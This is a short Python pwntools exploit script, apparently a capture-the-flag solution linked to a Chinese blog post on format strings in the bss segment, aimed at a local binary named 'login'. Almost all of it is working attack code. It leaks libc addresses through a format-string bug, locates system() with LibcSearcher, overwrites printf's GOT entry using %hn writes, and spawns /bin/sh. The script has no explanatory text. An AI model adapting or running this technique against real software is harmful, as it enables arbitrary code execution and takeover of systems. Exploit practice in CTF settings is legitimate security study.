http://www.starssgo.top/2019/12/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%A8bss%E6%AE%B5%E7%9A%84%E5%A4%84%E7%90%86/
from pwn import *
from LibcSearcher import *
io = process('./login')
elf = ELF('./login')
# gdb.attach(io,'b *0x080485AA')
def change(n,k):
payload = '%'+str(n)+'c%'+str(k)+'$hn'
io.sendlineafter('Try again!\n',payload)
io.sendlineafter('your name: \n','admin')
io.sendlineafter('password: \n','AAAA%15$pBBBB%6$p')
io.recvuntil('AAAA')
__libc_start_main = int(io.recv(10),16) - 247
libc = LibcSearcher('__libc_start_main',__libc_start_main)
offset = __libc_start_main - libc.dump('__libc_start_main')
success(hex(offset))
system = offset + libc.dump('system')
success(hex(system))
io.recvuntil('BBBB')
p = int(io.recv(10),16)
change(int(hex(p)[6:10],16)-12,6)
change(int('b014',16),10)
change(int(hex(p)[6:10],16)+4,6)
change(int('b016',16),10)
addr1=int(hex(system)[6:10],16)
addr2=int(hex(system)[2:6],16)
payload = '%'+str(addr1)+'c%7$hn'+'%'+str(addr2-addr1)+'c%11$hn'
io.sendlineafter('Try again!\n',payload)
io.sendlineafter('Try again!\n','/bin/sh\x00')
io.interactive()
# 6 7 10 11 15
#printf_got:0x0804b014
